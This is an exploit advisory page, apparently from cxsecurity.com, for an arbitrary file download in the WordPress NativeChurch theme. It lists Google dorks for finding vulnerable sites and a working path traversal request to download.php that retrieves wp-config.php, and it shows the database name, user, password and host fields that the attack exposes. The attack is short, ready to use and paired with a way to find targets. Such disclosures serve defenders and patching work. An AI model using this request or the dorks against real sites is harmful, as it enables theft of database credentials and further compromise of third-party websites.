WordPress NativeChurch Multi-Purpose Themes 5.0.x Arbitrary File Download

2019.02.27
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264

#################################################################### # Exploit Title : WordPress NativeChurch Multi-Purpose Themes 5.0.x Arbitrary File Download # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 26/02/2019 # Vendor Homepage : themeforest.net # Software Information Link : themeforest.net/item/nativechurch-multi-purpose-wordpress-theme/7082446 # Software Affected Versions : WordPress From 3.9 to 5.0.x Compatible with Bootstrap 3.x - bbPress 2.5.x From WooCommerce 2.1.x To WooCommerce 3.4.x, # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # Google Dorks : [PDF]Sample PDF File inurl:"/wp-content/themes/NativeChurch/" inurl:''inurl:/wp-content/themes/NativeChurch/download/'' # Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ] CWE-23 [ Relative Path Traversal ] # PacketStormSecurity : packetstormsecurity.com/files/authors/13968 # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/ # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos # Reference Link : packetstormsecurity.com/files/151851/WordPress-NativeChurch-Multi-Purpose-5.0.x-File-Download.html #################################################################### # Description about Software : *************************** NativeChurch is a powerful WordPress Theme designed & developed for Church, Charity, Non-Profit and Religious Websites and comes handy for Portfolio/Corporate Websites as well. #################################################################### # Impact : *********** * The NativeChurch theme for WordPress is prone to a vulnerability that lets attackers download arbitrary files because the application fails to sufficiently sanitize user-supplied input. An attacker can exploit this issue to download arbitrary files within the context of the web server process. Information obtained may aid in further attacks. Attackers can use a browser to exploit this issue. * The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize sequences such as ".." that can resolve to a location that is outside of that directory. #################################################################### # Arbitrary File Download Exploit : ****************************** /wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php # Example Informations about MySQL WordPress Configuration File : *********************************************************** /** Nom de la base de données de WordPress. */ define('DB_NAME', /** Utilisateur de la base de données MySQL. */ define('DB_USER', /** Mot de passe de la base de données MySQL. */ define('DB_PASSWORD', /** Adresse de l'hébergement MySQL. */ define('DB_HOST', ################################################################### # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ####################################################################

References:

packetstormsecurity.com/files/151851/WordPress-NativeChurch-Multi-Purpose-5.0.x-File-Download.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top